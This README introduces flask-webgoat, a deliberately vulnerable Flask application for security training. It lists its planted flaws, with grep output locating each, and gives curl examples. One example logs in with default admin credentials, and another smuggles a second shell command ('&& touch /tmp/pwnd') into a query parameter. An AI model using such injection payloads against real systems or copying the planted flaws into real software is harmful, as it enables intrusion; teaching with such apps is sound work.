flask-webgoat is a deliberately-vulnerable application written with the Flask web framework.
(_( /_/'_____/) " | | |""""""| ███████╗██╗ █████╗ ███████╗██╗ ██╗ ██╗ ██╗███████╗██████╗ ██████╗ ██████╗ █████╗ ████████╗ ██╔════╝██║ ██╔══██╗██╔════╝██║ ██╔╝ ██║ ██║██╔════╝██╔══██╗██╔════╝ ██╔═══██╗██╔══██╗╚══██╔══╝ █████╗ ██║ ███████║███████╗█████╔╝ ██║ █╗ ██║█████╗ ██████╔╝██║ ███╗██║ ██║███████║ ██║ ██╔══╝ ██║ ██╔══██║╚════██║██╔═██╗ ██║███╗██║██╔══╝ ██╔══██╗██║ ██║██║ ██║██╔══██║ ██║ ██║ ███████╗██║ ██║███████║██║ ██╗ ╚███╔███╔╝███████╗██████╔╝╚██████╔╝╚██████╔╝██║ ██║ ██║ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ python -m venv .venv . .venv/bin/activate pip install -r requirements.txt FLASK_APP=run.py flask run This project contains the following vulnerabilities:
- Remote Code Execution
- SQL injection
- Insecure Deserialization
- Directory Traversal
- Open Redirect
- Sensitive Data Exposure
- Broken Access Control
- Security Misconfiguration
You can find each one in the codebase by grepping for the string vulnerability:
$ grep vulnerability . -R -n | grep -v README ./flask_webgoat/actions.py:43: # vulnerability: Remote Code Execution ./flask_webgoat/users.py:37: # vulnerability: SQL Injection ./flask_webgoat/auth.py:17: # vulnerability: SQL Injection ./flask_webgoat/actions.py:60: # vulnerability: Insecure Deserialization ./flask_webgoat/actions.py:35: # vulnerability: Directory Traversal ./flask_webgoat/auth.py:45: # vulnerability: Open Redirect ./flask_webgoat/__init__.py:12: # vulnerability: Sensitive Data Exposure ./run.py:7: # vulnerability: Broken Access Control ./run.py:9: # vulnerability: Security Misconfiguration $ curl -b cookie.txt -d'username=admin&password=admin' localhost:5000/login $ curl -c cookie.txt localhost:5000/grep_processes?name=kworker $ curl -c cookie.txt "localhost:5000/grep_processes?name=xxx%20%26%26%20touch%20%2Ftmp%2Fpwnd"